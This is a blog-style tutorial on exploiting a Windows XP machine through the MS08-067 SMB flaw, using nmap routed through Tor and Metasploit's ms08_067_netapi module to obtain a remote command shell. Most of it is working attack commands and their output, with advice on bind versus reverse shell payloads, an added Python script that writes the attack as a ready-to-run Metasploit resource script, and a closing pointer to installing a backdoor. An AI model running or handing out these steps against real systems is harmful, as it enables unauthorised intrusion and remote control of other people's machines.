
Exploiting Windows with windows/smb/ms08_067_netapi
Author : Abdullah Al Muzammi, S.Kom
web blog : http://logsabdullah.blogspot.com
Email : muzammi06@gmail.com
bismillah
hi...
Today I will show you how to use an exploit framework (Metasploit). The target is a
machine running Windows.
Okay..
First I need the target's IP address. Here the target is 192.168.56.101 and my own
machine is 192.168.56.1. Hembzs... Before exploiting anything we gather information
about the target system: we use nmap to find out which services the target exposes.
For example:
root@portme-net:~# proxychains nmap -sV 192.168.56.101
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-01 03:15 WIT
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:80
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:135
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:139
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:445
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:3306
Nmap scan report for 192.168.56.101
Host is up (0.00036s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http?
135/tcp  open  msrpc?
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds?
3306/tcp open  mysql?
MAC Address: 08:00:27:EF:B6:6D (Cadmus Computer Systems)
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
root@portme-net:~#

I am using Tor (through proxychains, SOCKS on 127.0.0.1:9050) for anonymity; my
machine runs Linux i686. One thing to check before trusting that: proxychains only
redirects connect() calls, and nmap run as root defaults to a SYN scan over raw
sockets. The |S-chain| lines above show only the five version probes to the open
ports being relayed, and nmap reports the target's MAC address, which it can only
learn by ARP on the local Ethernet segment (192.168.56.0/24 is the VirtualBox
host-only network, and 08:00:27 is VirtualBox's OUI). So the port sweep itself went
straight to the target, not through Tor. That is fine in a lab like this one; for a
scan that really must go through the proxy, use a TCP connect scan (-sT) with -Pn,
so that every packet nmap sends is a connect() that proxychains can hook. The "?"
after each service name means version detection could not confirm the service.
Okay, now we have the target's open ports and MAC address; next we start msfconsole:
=[ metasploit v3.7.0-release [core:3.7 api:1.0]
+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
msf > search netapi
[*] Searching loaded modules for pattern 'netapi'...

Exploits
========

   Name                         Disclosure Date  Rank    Description
   ----                         ---------------  ----    -----------
   windows/smb/ms03_049_netapi  2003-11-11       good    Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms06_040_netapi  2006-08-08       great   Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_070_wkssvc  2006-11-14       manual  Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms08_067_netapi  2008-10-28       great   Microsoft Server Service Relative Path Stack Corruption
The search for "netapi" lists the exploit we want, windows/smb/ms08_067_netapi
(rank "great", disclosed 2008-10-28). Next, load it and set RHOST to the target:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
To see which options the module needs, run show options:
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
The module is ready: RHOST is the target and RPORT is 445, the SMB port on which
the vulnerable Server service is reached (through the named pipe given by SMBPIPE).
Next we need a payload. Here we use a bind TCP shell: the payload makes the target
listen on a port (LPORT, 4444 by default) and Metasploit connects to it. That works
on a host-only lab network; against a firewalled or NATed target a reverse payload
(windows/shell/reverse_tcp, with LHOST set to our own address) is the usual choice,
because then the target connects back to us. To see the bind payloads available,
search for "bind":
msf exploit(ms08_067_netapi) > search bind
[*] Searching loaded modules for pattern 'bind'...
...
windows/shell_bind_tcp
...
Now set the payload. Note that the search listed windows/shell_bind_tcp, a
single-stage shell, while we set windows/shell/bind_tcp, the staged version: the
exploit delivers a small stager first, and the "Sending stage (240 bytes)" line in
the exploit output further down is the second stage being sent. Either works with
this module:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.56.101   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

msf exploit(ms08_067_netapi) > exploit


[*] Started bind handler
[*] Sending stage (240 bytes) to 192.168.56.101
[*] Automatically detecting the target...
[*] Command shell session 1 opened (192.168.56.1:57959 -> 192.168.56.101:4444) at 2011-09-01 00:54:16 +0700
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows XP SP3 English (NX)
[-] Exploit exception: The SMB server did not reply to our request
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\hakaje\My Documents>
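As an added example (not part of the original post), here is a Python 3 script that turns the two manual steps above, the nmap scan and the msfconsole session, into one checkable flow. It parses the nmap output reproduced from this walkthrough (embedded as a constructed sample string), flags the two signs that the scan did not actually go through the proxy, and writes the msfconsole commands as a resource script for `msfconsole -r`. The function names, the resource-script layout and the leak heuristics are my own choices, not Metasploit's.

```python
import re

# Constructed sample input: the nmap run from the walkthrough above, reproduced
# so the parser can be exercised without a live target.
SAMPLE_NMAP_OUTPUT = """\
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-01 03:15 WIT
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:80
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:135
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:139
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:445
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.101:3306
Nmap scan report for 192.168.56.101
Host is up (0.00036s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http?
135/tcp  open  msrpc?
139/tcp  open  netbios-ssn?
445/tcp  open  microsoft-ds?
3306/tcp open  mysql?
MAC Address: 08:00:27:EF:B6:6D (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
PORT_LINE = re.compile(r"^(\d+)/tcp\s+(\w+)\s+(\S+)")
MAC_LINE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")
# proxychains prints one S-chain line per connect() it relayed; the last
# host:port on the line is the destination it connected to.
CHAIN_LINE = re.compile(r"-(\d+\.\d+\.\d+\.\d+):(\d+)\s*$")


def parse_nmap(text):
    """Return host, open TCP ports (port -> service), MAC address if nmap saw
    one, and the destination ports proxychains actually relayed."""
    info = {"host": None, "open": {}, "mac": None, "proxied": set()}
    for line in text.splitlines():
        if line.startswith("|S-chain|"):
            m = CHAIN_LINE.search(line)
            if m:
                info["proxied"].add(int(m.group(2)))
            continue
        m = HOST_LINE.match(line)
        if m:
            info["host"] = m.group(1)
            continue
        m = PORT_LINE.match(line)
        if m and m.group(2) == "open":
            info["open"][int(m.group(1))] = m.group(3)
            continue
        m = MAC_LINE.match(line)
        if m:
            info["mac"] = m.group(1)
    return info


def proxy_leak_reasons(info):
    """Heuristics (my own) for 'the scan reached the target directly'. nmap run
    as root defaults to a SYN scan over raw sockets, which proxychains (an
    LD_PRELOAD hook on connect()) cannot redirect; only the later version
    probes use connect(). Returns a list of findings; empty means clean."""
    reasons = []
    if info["mac"]:
        # nmap learns a MAC only via ARP, i.e. from the same Ethernet segment.
        reasons.append("MAC address reported: target is on the local segment, "
                       "not behind the proxy")
    if info["proxied"] and info["proxied"] == set(info["open"]):
        reasons.append("proxychains relayed only the version probes to the "
                       "open ports; the port sweep itself was not proxied")
    return reasons


def ms08_067_resource_script(info, payload="windows/shell/bind_tcp", lport=4444):
    """Write the manual msfconsole steps from the walkthrough as a resource
    script (run with: msfconsole -r target.rc). Returns None when TCP/445 is
    not open, since the module talks to the Server service over SMB there."""
    if 445 not in info["open"]:
        return None
    lines = [
        "use exploit/windows/smb/ms08_067_netapi",
        "set RHOST %s" % info["host"],
        "set RPORT 445",
        "set PAYLOAD %s" % payload,
        "set LPORT %d" % lport,
        "exploit",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    info = parse_nmap(SAMPLE_NMAP_OUTPUT)
    print("host %s, open ports %s" % (info["host"], sorted(info["open"])))
    for reason in proxy_leak_reasons(info):
        print("WARNING:", reason)
    rc = ms08_067_resource_script(info)
    print(rc if rc else "TCP/445 closed: ms08_067_netapi does not apply")
```

Run against the sample, the script prints both warnings, which is the point: on this host-only lab network Tor added nothing, and the resource script it emits is exactly the sequence typed by hand above. Feed it the output of a `-sT -Pn` scan run through proxychains and the warnings go away.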
Wow.... now you have a shell on the target. It's that simple. Two things are worth
noting in the output. The bind handler connected and the session opened before the
"Exploit exception: The SMB server did not reply to our request" line, so that error
is harmless here: the Server service thread we hijacked was already running our
payload instead of answering the request. It is not always harmless, though. MS08-067
corrupts the stack in the process hosting the Server service, and a failed attempt
(wrong target selected, wrong offsets) can crash that service and take SMB down with
it, which is why Automatic Targeting with a correct fingerprint matters.
After the exploit has run, I hope the backdoor application is running on the target
system; you can read my article on how to build and run a backdoor.
Okay.. that's enough. Hembzs.. Lombok is my home. Learn, learn... and learn...
